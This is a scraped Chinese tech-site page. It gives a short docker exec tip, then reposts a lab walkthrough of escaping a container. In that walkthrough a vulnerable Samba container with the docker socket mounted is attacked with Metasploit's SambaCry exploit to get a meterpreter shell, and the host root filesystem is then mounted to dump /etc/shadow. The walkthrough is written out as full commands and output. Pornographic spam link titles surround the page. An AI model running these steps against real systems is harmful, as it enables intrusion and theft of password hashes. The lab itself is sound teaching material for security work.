欧美阿v视频在线大全_亚洲欧美中文日韩V在线观看_www性欧美日韩欧美91_亚洲欧美日韩久久精品

主頁 > 知識庫 > 在宿主機上執行docker容器內部的shell或程序方式

在宿主機上執行docker容器內部的shell或程序方式

熱門標簽:中國地圖標注上各個省 撫州市城區地圖標注 電銷智能機器人試用 高德地圖標注足跡怎么打標 新鄉牧野400電話申請 百度地圖底圖標注 企業辦理400電話收費標準 智能電銷機器人真的有用么 激光標記地圖標注

為了避免反復進入docker容器內部操作,可以將一系列容器內部的指令由宿主機來操作完成。

在宿主機(作者主機為windows7)上執行centos容器(name為centos-1)中/usr目錄下的“printer”可執行程序,該程序輸出為打印“123”。

C:\Users\Administrator>docker exec -it centos-1 /bin/bash -c "cd usr && ./printer" 123

成功。

補充知識:利用Docker容器的不安全部署獲取宿主機權限

前言

濫用容器( container)及逃逸的方法有多種,本文將討論最基本的一種,即濫用docker socket來逃逸容器并在宿主機上以root身份執行代碼。

實驗環境設置

由于我們將使用容器,因此你必須安裝docker。

創建網絡

首先,我們在創建容器的地方創建一個docker網絡:

docker network create pwnage

啟動易受攻擊的容器

在本示例中,我將使用受SambaCry漏洞(CVE-2017-7494)影響的容器。有關該漏洞的更多信息,可以參閱opsxcq/exploit-CVE-2017-7494。

此漏洞允許你在Samba服務器中遠程代碼執行,我們將docker socket添加到容器中,以下是一個濫用docker的示例。

docker run --rm -it \

    --name vulnerable \

    --network pwnage \

    -v '/var/run/docker.sock:/var/run/docker.sock' \

    vulnerables/cve-2017-7494

啟動攻擊機

實驗環境設置完成后,接下來我們需要將攻擊者的主機添加到網絡中。Samba Cry存儲庫中有一個漏洞利用代碼,但這里我將使用Metasploit,因為它更容易上傳我所需的內容。

我已經為此構建了一個映像,只需運行bellow命令,所有內容都將根據實驗環境需要運行:

docker run --rm -it \

    --network pwnage \

    -v '/usr/bin/docker:/docker:ro' \

    strm/metasploit

加載完成后,你將看到如下界面。

攻擊利用

信息收集

在任何攻擊或測試中,信息收集都是必不可少的一個環節。因此,讓我們先來ping下易受攻擊的容器檢查下當前的連接情況。

ping -c 2 vulnerable

如果一切正常,你應該能看到以下輸出信息。

msf5 > ping -c 2 vulnerable 
[*] exec: ping -c 2 vulnerable 
 
PING vulnerable (172.20.0.2) 56(84) bytes of data.
64 bytes from vulnerable.pwnage (172.20.0.2): icmp_seq=1 ttl=64 time=0.120 ms
64 bytes from vulnerable.pwnage (172.20.0.2): icmp_seq=2 ttl=64 time=0.097 ms
 
--- vulnerable ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1009ms
rtt min/avg/max/mdev = 0.097/0.108/0.120/0.015 ms

然后,我們進行基本的smb共享枚舉:

use auxiliary/scanner/smb/smb_enumshares
set rhosts vulnerable
run

輸出結果如下:

msf5 > use auxiliary/scanner/smb/smb_enumshares
msf5 auxiliary(scanner/smb/smb_enumshares) > set rhosts vulnerable
rhosts => vulnerable
msf5 auxiliary(scanner/smb/smb_enumshares) > run
 
[+] 172.20.0.2:139    - data - (DS) Data
[+] 172.20.0.2:139    - IPC$ - (I) IPC Service (Crying samba)
[*] vulnerable:      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

可以看到,這個samba服務器中有一個名為data的共享。

獲取shell

下一步我們要做的是,針對宿主機運行漏洞利用程序獲取shell。在Metasploit中,該漏洞名為is_known_pipename,位于exploit/linux/samba/is_known_pipename。

運行bellow命令攻擊宿主機:

use exploit/linux/samba/is_known_pipename
set RHOST vulnerable
set RPORT 445
set payload linux/x64/meterpreter/bind_tcp
set TARGET 3
set SMB_FOLDER data
set SMBUser sambacry
set SMBPass nosambanocry
exploit

如果一切順利,你將獲取到一個meterpreter shell。如下:

msf5 > use exploit/linux/samba/is_known_pipename
msf5 exploit(linux/samba/is_known_pipename) > set RHOST vulnerable
RHOST => vulnerable
msf5 exploit(linux/samba/is_known_pipename) > set RPORT 445
RPORT => 445
msf5 exploit(linux/samba/is_known_pipename) > set payload linux/x64/meterpreter/bind_tcp
payload => linux/x64/meterpreter/bind_tcp
msf5 exploit(linux/samba/is_known_pipename) > set TARGET 3
TARGET => 3
msf5 exploit(linux/samba/is_known_pipename) > set SMB_FOLDER data
SMB_FOLDER => data
msf5 exploit(linux/samba/is_known_pipename) > set SMBUser sambacry
SMBUser => sambacry
msf5 exploit(linux/samba/is_known_pipename) > set SMBPass nosambanocry
SMBPass => nosambanocry
msf5 exploit(linux/samba/is_known_pipename) > exploit
 
[*] vulnerable:445 - Using location \\vulnerable\data\ for the path
[*] vulnerable:445 - Retrieving the remote path of the share 'data'
[*] vulnerable:445 - Share 'data' has server-side path '/data
[*] vulnerable:445 - Uploaded payload to \\vulnerable\data\shyyEPPk.so
[*] vulnerable:445 - Loading the payload from server-side path /data/shyyEPPk.so using \\PIPE\/data/shyyEPPk.so...
[-] vulnerable:445 -  >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] vulnerable:445 - Loading the payload from server-side path /data/shyyEPPk.so using /data/shyyEPPk.so...
[-] vulnerable:445 -  >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] Started bind TCP handler against vulnerable:4444
[*] Sending stage (816260 bytes) to vulnerable
 
meterpreter >

提權

我們將通過濫用容器內可用的docker socket來提權。由于docker在宿主機上是以root身份運行的,因此它也具有root權限。我們可以濫用它來執行多項操作。例如,使用—privileged選項可以為我們提供許多擴展功能,以下是從docker官方文檔中提取的解釋文本:

默認情況下,Docker的容器是沒有特權的,例如不能在容器中再啟動一個容器。這是因為默認情況下容器是不能訪問任何其它設備的。但是通過”privileged”,容器就擁有了訪問任何其它設備的權限。當操作者執行docker run —privileged時,Docker將擁有訪問主機所有設備的權限,同時Docker也會在apparmor或者selinux做一些設置,使容器可以容易的訪問那些運行在容器外部的設備。

你可以使用—device選項訪問設備。但在本示例中,我將映射toor文件系統 (/) 到容器中并訪問它。

由于此容器中沒有docker客戶端,因此下一步我們要做的就是在目標容器中設置docker客戶端及其依賴項。你只需運行以下命令,即可完成所有這些操作。

upload /docker /docker
upload /usr/lib/x86_64-linux-gnu/libltdl.so.7 /usr/lib/x86_64-linux-gnu/libltdl.so.7
chmod 777 /docker
chmod +x /docker
meterpreter > upload /docker /docker
[*] uploading : /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] uploaded  : /docker -> /docker
meterpreter > upload /usr/lib/x86_64-linux-gnu/libltdl.so.7 /usr/lib/x86_64-linux-gnu/libltdl.so.7
[*] uploading : /usr/lib/x86_64-linux-gnu/libltdl.so.7 -> /usr/lib/x86_64-linux-gnu/libltdl.so.7
[*] Uploaded -1.00 B of 38.47 KiB (-0.0%): /usr/lib/x86_64-linux-gnu/libltdl.so.7 -> /usr/lib/x86_64-linux-gnu/libltdl.so.7
[*] uploaded  : /usr/lib/x86_64-linux-gnu/libltdl.so.7 -> /usr/lib/x86_64-linux-gnu/libltdl.so.7
meterpreter > chmod 777 /docker
meterpreter > chmod +x /docker
meterpreter >

現在,我們就可以使用docker來訪問宿主機上的文件系統了。\

execute -f /docker -i -H -c -a "run --rm -v '/:/rootfs' debian:9.2 cat /rootfs/etc/shadow"

我們來轉儲下本地用戶的哈希,輸出結果如下:

meterpreter > execute -f /docker -i -H -c -a "run --rm -v '/:/rootfs' debian:9.2 cat /rootfs/etc/shadow"
Process 113 created.
Channel 13 created.
root:$1$UFKdtFGw$qp29y1qGWit/vnvIG0uSr1:17488:0:99999:7:::
daemon:*:17488:0:99999:7:::
bin:*:17488:0:99999:7:::
sys:*:17488:0:99999:7:::
sync:*:17488:0:99999:7:::
games:*:17488:0:99999:7:::
man:*:17488:0:99999:7:::
lp:*:17488:0:99999:7:::
mail:*:17488:0:99999:7:::
news:*:17488:0:99999:7:::

以上這篇在宿主機上執行docker容器內部的shell或程序方式就是小編分享給大家的全部內容了,希望能給大家一個參考,也希望大家多多支持腳本之家。

標簽:邯鄲 南通 辛集 海西 延安 忻州 臨汾 西安

巨人網絡通訊聲明:本文標題《在宿主機上執行docker容器內部的shell或程序方式》,本文關鍵詞  在,宿主,機上,執行,docker,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《在宿主機上執行docker容器內部的shell或程序方式》相關的同類信息!
  • 本頁收集關于在宿主機上執行docker容器內部的shell或程序方式的相關信息資訊供網民參考!
  • 推薦文章
    欧美阿v视频在线大全_亚洲欧美中文日韩V在线观看_www性欧美日韩欧美91_亚洲欧美日韩久久精品
  • <rt id="w000q"><acronym id="w000q"></acronym></rt>
  • <abbr id="w000q"></abbr>
    <rt id="w000q"></rt>
    精品国产91乱码一区二区三区| 国产成人精品一区二区三区四区| 国产精品久久综合| 91精品国产综合久久国产大片| 国模无码视频一区| 国产精品成人免费一区久久羞羞| 色综合色综合色综合| 欧美mv日韩mv国产网站app| 视频一区视频二区中文| 中文字幕一区二区三区乱码不卡| 欧美三级日本三级少妇99| 亚洲欧美激情在线| av高清不卡在线| a级黄色片免费看| 一区二区中文字幕在线| 成人黄页毛片网站| 色婷婷激情综合| 亚洲激情欧美激情| 91免费视频网| 欧美日韩成人高清| 午夜精品福利在线| aa一级黄色片| 久久在线免费观看| 国产河南妇女毛片精品久久久| 欧美视频一区二区在线| 中文成人av在线| 成人激情免费网站| 色婷婷国产精品| 亚洲午夜一区二区| 91黄色免费视频| 欧美videos中文字幕| 国模套图日韩精品一区二区| 久久嫩草捆绑紧缚| 亚洲欧美视频在线观看视频| 少妇性l交大片7724com| 欧美放荡的少妇| 精品在线一区二区| 天天操天天操天天操天天操天天操| 亚洲素人一区二区| 人妻av一区二区三区| 日韩三级免费观看| 国产酒店精品激情| 色先锋久久av资源部| 午夜国产精品一区| 内射毛片内射国产夫妻| 椎名由奈av一区二区三区| 亚洲婷婷在线观看| 久久久久久久久久久久久女国产乱 | 久久久亚洲国产美女国产盗摄| 国产久卡久卡久卡久卡视频精品| 日本精品一区二区三区高清 | 亚洲美女区一区| 强迫凌虐淫辱の牝奴在线观看| 2欧美一区二区三区在线观看视频| 国产91对白在线观看九色| 欧美性videosxxxxx| 蜜桃精品在线观看| 国产十六处破外女视频| 色综合一区二区| 亚洲国产一二三| 国产三级黄色片| 亚洲激情校园春色| 亚洲精品国产熟女久久久| 国产精品传媒在线| 在线精品一区二区三区| 国产精品入口麻豆九色| 久草视频福利在线| 日本一区二区视频在线观看| 亚洲欧洲国产视频| 欧美国产在线观看| 久久久久久久人妻无码中文字幕爆| 精品粉嫩aⅴ一区二区三区四区| av电影在线观看不卡| 日韩欧美你懂的| 99久久婷婷国产精品综合| 精品三级在线看| 日本少妇一区二区三区| 欧美激情中文字幕一区二区| 精品人妻伦一二三区久| 国产精品国产三级国产普通话99| 天天插天天射天天干| 日韩码欧中文字| 亚洲午夜精品久久久久久高潮| 欧美一区二区精品久久911| 国产成人啪午夜精品网站男同| 欧美一区二区国产| 99久久久无码国产精品| 久久综合视频网| 免费黄色三级网站| 亚洲人成电影网站色mp4| 欧美大波大乳巨大乳| 亚洲电影你懂得| 午夜69成人做爰视频| 狠狠色综合日日| 欧美一区二区三区日韩| 97久久超碰国产精品| 国产欧美日韩精品一区| 老鸭窝一区二区| 亚洲成av人片一区二区梦乃| 色综合久久精品| 国产乱码精品1区2区3区| 日韩三级.com| 国产精品久久久久久亚洲av| 亚洲人精品午夜| 老湿机69福利| 国产寡妇亲子伦一区二区| 精品成人一区二区三区四区| 国产精品扒开腿做爽爽爽a片唱戏| 亚洲三级在线免费观看| 人与动物性xxxx| 国内外精品视频| 欧美成人精品3d动漫h| 国产大尺度视频| 一区二区高清免费观看影视大全 | 日本不卡123| 欧美精品乱人伦久久久久久| 91丨国产丨九色丨pron| 1024精品合集| 欧美色图亚洲视频| 国产91在线看| 国产精品免费网站在线观看| ass极品国模人体欣赏| 久久国产尿小便嘘嘘| 精品日韩一区二区| 亚洲观看黄色网| 日韩精品91亚洲二区在线观看| 欧美精品在线一区二区三区| 国产老头和老头xxxx×| 很污很黄的网站| 国产精品一卡二卡在线观看| 久久精品网站免费观看| 亚洲黄色网址大全| 国产高清视频一区| 中文字幕一区二区日韩精品绯色| 亚洲色偷偷综合亚洲av伊人| 国产经典欧美精品| 亚洲国产精品精华液ab| 欧美日韩色视频| 不卡一区在线观看| 亚洲精品乱码久久久久久黑人 | 美国黄色一级视频| 亚洲大片一区二区三区| 777久久久精品| 国产精品久久不卡| 久久精品av麻豆的观看方式| 久久免费的精品国产v∧| 色撸撸在线视频| 高清不卡一区二区| 亚洲欧美日韩国产手机在线| 欧美性大战久久久久久久 | 2025中文字幕| 午夜精品一区二区三区三上悠亚| 91麻豆精品国产91久久久更新时间| 成人性生活免费看| 久久激情五月激情| 国产欧美视频一区二区| 91在线播放观看| 久久久久久久久久久久国产精品| 视频在线观看91| 久久嫩草精品久久久久| 最新一区二区三区| 丰满饥渴老女人hd| 日韩精品色哟哟| 国产亚洲午夜高清国产拍精品| 加勒比婷婷色综合久久| 无码人妻aⅴ一区二区三区玉蒲团| 日本vs亚洲vs韩国一区三区| 久久婷婷一区二区三区| 成年人av电影| 麻豆精品国产传媒av| 国产资源精品在线观看| 亚洲免费视频中文字幕| 欧美一区二区三区四区视频| 手机av在线不卡| 18深夜在线观看免费视频| 男人的j进女人的j一区| 日本一区二区三级电影在线观看| 色婷婷精品久久二区二区蜜臀av | 日韩一区二区电影在线| 国产三级aaa| 午夜影院福利社| 激情综合色综合久久综合| 亚洲免费资源在线播放| 欧美v日韩v国产v| 日本久久一区二区| 久久亚洲AV无码专区成人国产| 成人av网站在线观看免费| 丝袜诱惑亚洲看片| 国产精品欧美一区喷水| 91精品国产乱| 欧洲猛交xxxx乱大交3| 大黑人交xxx极品hd| 99久久久精品| 极品少妇xxxx偷拍精品少妇| 一区二区在线观看av| 26uuu久久综合| 欧美日韩精品欧美日韩精品一| 成人性视频免费看| 人妻av一区二区| 高清av一区二区|